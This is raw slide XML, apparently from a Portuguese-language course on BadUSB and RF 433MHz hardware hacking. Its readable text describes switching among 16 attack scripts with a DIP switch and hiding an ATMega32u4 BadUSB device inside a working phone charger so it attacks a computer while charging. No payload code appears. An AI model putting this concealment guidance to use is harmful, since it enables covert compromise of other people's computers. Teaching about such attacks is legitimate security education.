            <a:off x="9979339" y="4623902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F01C82B9-D33B-4CFF-A6A7-210AE1829C78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9981583" y="4793990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DEF16252-6D66-49A5-A2AD-E44642D9B3B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9979339" y="4913045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6AB8841D-CC8B-4C81-BC2E-984284DECE4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9985772" y="5065610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E5E8FE5F-C847-4789-8B87-AA4CAF562279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9985772" y="5352466"/>
            <a:ext cx="131994" cy="74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CFD9E7F7-7DD2-442C-A81D-64EC95821201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996273" y="3148603"/>
            <a:ext cx="1150043" cy="2344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Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A755CE-574D-4B7B-A365-0490225285CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="115" idx="0"/>
            <a:endCxn id="96" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="9033794" y="3678461"/>
            <a:ext cx="66100" cy="1956983"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 96618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6D900F44-D6DA-4F40-9538-E5115C761CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8022356" y="4690002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F2218088-6DF1-4779-94CB-7A39261D9FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8246697" y="4690002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A9D1D57D-3C36-4FEC-905B-56E26DE5DC0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8431535" y="4691894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8A36FF2-AFED-4BA1-A488-D2C0FBF5B08B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8628635" y="4687316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9" name="Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F297BDA4-F590-4569-BA45-70F9394060A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="116" idx="0"/>
            <a:endCxn id="107" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9076534" y="3926161"/>
            <a:ext cx="141207" cy="1668889"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -340118"/>
              <a:gd name="adj2" fmla="val 9420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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DF0963-FC27-4692-BC71-B763BF5AF94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="117" idx="0"/>
            <a:endCxn id="110" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9109250" y="4080176"/>
            <a:ext cx="258370" cy="1481807"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -124194"/>
              <a:gd name="adj2" fmla="val 8506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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0327532-6729-4026-B709-2FE6067411D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="118" idx="0"/>
            <a:endCxn id="111" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9132445" y="4249502"/>
            <a:ext cx="415513" cy="1291140"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38864"/>
              <a:gd name="adj2" fmla="val 6879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E33D924D-965E-4CEB-9D24-B727E0BF865C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8107005" y="5254574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3" name="Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B1CCAA-CAF3-4B49-92A4-B2FC2B197B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="122" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9063439" y="4438574"/>
            <a:ext cx="97892" cy="1878767"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33352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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21735C5D-7008-4833-B7FA-A6213C8F89FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="125" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9138883" y="4514017"/>
            <a:ext cx="106545" cy="1719228"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 314557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0A84A520-9BBD-4B5E-815F-7545EDCE9D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8266544" y="5245921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4218C11-6F11-4A05-A3C2-522707314BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8417339" y="5254574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FC0B9D89-F856-4D61-AB65-9311FD3A3D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8576878" y="5245921"/>
            <a:ext cx="131994" cy="7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8" name="Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975F68A5-A497-4C22-ABB5-962424F92514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="126" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9218606" y="4593741"/>
            <a:ext cx="97892" cy="1568433"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33352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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B63743B4-831F-4045-A36B-A92B4601D79C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="127" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9294050" y="4669184"/>
            <a:ext cx="106545" cy="1408894"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 314557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 descr="Resultado de imagem para dips witch png&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{167D9BE0-8281-4BDC-A3AD-3C4DC1C8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05" y="4566460"/>
            <a:ext cx="938020" cy="93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FC3E8CE6-F13A-4DCB-85F2-B54DB23B4C2C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492092" y="2234724"/>
            <a:ext cx="4778861" cy="3948463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Retângulo 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36527668-9705-4F41-9201-726948FA827A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405665" y="1216145"/>
            <a:ext cx="11380670" cy="746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D9FA74A-5964-4553-B713-515704477843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646854" y="1309510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F330359-8B46-495F-B544-B399A209C41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833913" y="1216144"/>
            <a:ext cx="1086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 um DIP Switch de 4 botões você pode criar até 16 scripts diferentes (2^4) e alternar entre eles com um simples chaveamento</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19746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96" grpId="0"/>
      <p:bldP spid="107" grpId="0"/>
      <p:bldP spid="110" grpId="0"/>
      <p:bldP spid="111" grpId="0"/>
      <p:bldP spid="112" grpId="0"/>
      <p:bldP spid="115" grpId="0" animBg="1"/>
      <p:bldP spid="116" grpId="0" animBg="1"/>
      <p:bldP spid="117" grpId="0" animBg="1"/>
      <p:bldP spid="118" grpId="0" animBg="1"/>
      <p:bldP spid="122" grpId="0" animBg="1"/>
      <p:bldP spid="125" grpId="0" animBg="1"/>
      <p:bldP spid="126" grpId="0" animBg="1"/>
      <p:bldP spid="127" grpId="0" animBg="1"/>
      <p:bldP spid="74" grpId="0" animBg="1"/>
      <p:bldP spid="75" grpId="0" animBg="1"/>
      <p:bldP spid="7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Tornando as coisas mais interessantes - Continuação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33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D83A3F6-AEC5-4170-B075-9A6DD96C5CB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684536" y="1442382"/>
            <a:ext cx="5429027" cy="45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Escondendo o dispositivo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34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85D3E6C2-3481-4F78-90AE-94FE930FABFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421710" y="1120467"/>
            <a:ext cx="11380670" cy="1066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AC449A2-E184-49FE-A046-B5CAADB72BE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646854" y="1309510"/>
            <a:ext cx="144000" cy="144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dist="76200" dir="5400000" sx="77000" sy="77000" algn="t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4A75AF2B-B0BA-4520-B4EA-36504A12D3BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833912" y="1216144"/>
            <a:ext cx="10826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vimos no Módulo 1, existem várias formas de esconder um dispositivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> e para o ATMega32u4 escolhi um carregador de celular. O objetivo é tornar o carregador funcional ao mesmo tempo que realiza o ataque no computador.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B1C4345B-9092-46EC-8B67-FD46A1BD085F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="4"/>
            <a:endCxn id="70" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4964495" y="2802596"/>
            <a:ext cx="539196" cy="3828379"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19996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2E2B10CB-DF4A-43C8-9A43-E97913067E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3272768" y="4382468"/>
            <a:ext cx="94271" cy="6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3A6E2A4B-3B80-4286-86B3-4D818F6C663A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3441219" y="4382468"/>
            <a:ext cx="94271" cy="6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CED484BD-31E6-45A3-B3B6-9DA74C4B8CA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7079703" y="4921257"/>
            <a:ext cx="45719" cy="64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E153CE47-9F90-4814-8E0D-2332D927222C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7125423" y="4921664"/>
            <a:ext cx="45719" cy="64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7A49A374-76CB-4F97-A95F-D73A6A36D96B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="66" idx="4"/>
            <a:endCxn id="69" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5026065" y="2909478"/>
            <a:ext cx="538789" cy="3614208"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14242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3C95358-86F4-484C-B0C3-B9A8755AD32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151452" y="2691971"/>
            <a:ext cx="1310754" cy="1853345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 2" descr="Resultado de imagem para cabo usb png fios&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52472B71-B3F2-495B-A20C-E0A1ABD1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56390" y="3253339"/>
            <a:ext cx="2333147" cy="116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9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5" grpId="0" animBg="1"/>
      <p:bldP spid="86" grpId="0" animBg="1"/>
      <p:bldP spid="87" grpId="0"/>
      <p:bldP spid="50" grpId="0" animBg="1"/>
      <p:bldP spid="66" grpId="0" animBg="1"/>
      <p:bldP spid="69" grpId="0" animBg="1"/>
      <p:bldP spid="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997286-0C3F-4086-9D56-E65F029267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DCE1A7B1-D498-4559-B8CE-40EA11B18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13010CC-D564-4FF5-A356-7F06DCB7B612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2ECF32A-B95A-4DEA-BD24-7A77EFE3455D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Engrenagem única">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F739CF-33AD-480B-BA05-750CE2E3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31" name="Gráfico 30" descr="Engrenagens">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A70D8C-B9DB-4600-A1F3-47E50CDA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33" name="Gráfico 32" descr="Pato de borracha">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A20C3F47-CBD4-4B0D-91FE-4341835B5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35" name="Gráfico 34" descr="Microfone de rádio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A8D50C-FB89-44CB-B750-7A8008761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37" name="Gráfico 36" descr="Telefone">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C42DD50-CB7E-42FC-98DD-AF6EA5DC0F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39" name="Gráfico 38" descr="Chave inglesa">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18FACE9A-BE11-4587-9923-04CC517A6F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41" name="Gráfico 40" descr="Ferramentas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90596D84-9CE6-4F89-A9AE-6403C01ABA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43" name="Gráfico 42" descr="Bateria cheia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8382B077-F998-47CF-A8B7-48D17065C8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45" name="Gráfico 44" descr="Controlador de jogo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E88AC08F-54D3-403F-BA36-93DBC96F7E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47" name="Gráfico 46" descr="Câmera de segurança">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F0A863-35C0-49CD-B13E-4EE15CD93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49" name="Gráfico 48" descr="Desbloquear">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1DF1E3-7FDD-4814-A8B2-7696831EFE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51" name="Gráfico 50" descr="Plugue">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F3DD15-1B35-42F4-BEA4-81CCD3BC0C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53" name="Gráfico 52" descr="USB">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{744F5A45-45FF-4898-9D5F-28E0D5D587F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55" name="Gráfico 54" descr="Processador">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD905DCF-7055-4FCB-97AE-2B3D1C601F8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57" name="Gráfico 56" descr="Roteador sem fio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA11CA05-43C5-4722-B7A3-B9DA0B4B8C9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59" name="Gráfico 58" descr="Controle remoto">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9888ADA9-C619-4B35-BD44-510E2989ECE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61" name="Gráfico 60" descr="Bluetooth">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D797AE56-1627-4E99-9504-F3867B5910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63" name="Gráfico 62" descr="Robô">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842B6465-287B-48CE-90D3-B7B9AAB5B63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65" name="Gráfico 64" descr="Torre de Celular">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D529A88-EFA0-44E6-8099-DEDEA05AF4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67" name="Gráfico 66" descr="Smartphone">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E8CA4C-1620-424F-9AFC-A2708B662EC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69" name="Gráfico 68" descr="Sem fio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2168B870-05F7-4006-A2E3-BE41C251DC7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71" name="Gráfico 70" descr="Wi-Fi">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2A1EF23-83CA-4059-A2C5-27B8656838E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73" name="Gráfico 72" descr="Carregando">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346EE92B-0F6E-4027-9238-A114BD96788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75" name="Gráfico 74" descr="Voz">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CCE79FB-79A9-4AF1-A6B8-097318526DF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pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Gráfico 76" descr="Carregamento de bateria">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F075C0-55D2-4556-A5C6-2D4BFCF818E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657169" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Retângulo 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B2BFE15-46C7-4521-81CA-FB06412B68B5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9D390650-288E-4161-B482-71B5A4E9D259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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43079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4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039398" y="453860"/>
            <a:ext cx="10541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Introdução ao RF433Mhz</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Cubo 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CC3D01-E3DF-4958-9014-5D5E1126A4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2038762" y="3429000"/>
            <a:ext cx="2470826" cy="676778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Cubo 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DD11C9-EB1D-473C-8DE5-996C7618B197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2038762" y="4038221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ubo 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD52EC15-7F99-40F4-AA9C-D90DC593E572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4654814" y="3451703"/>
            <a:ext cx="2470826" cy="676778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ubo 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB803E9-B55D-46B0-80EA-CBFA97BC0C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4654814" y="4060924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Cubo 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A89426A-3611-4A25-BC50-056F75E4ED21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7285349" y="3465443"/>
            <a:ext cx="2470826" cy="676778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Cubo 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CAA4BC7-5075-4546-90B1-90A66EDF571A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7285349" y="4074664"/>
            <a:ext cx="2470826" cy="2143364"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 6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E061872E-EFD2-4C2C-B60D-4AAAB555F311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124503" y="4398835"/>
            <a:ext cx="2314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Smart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
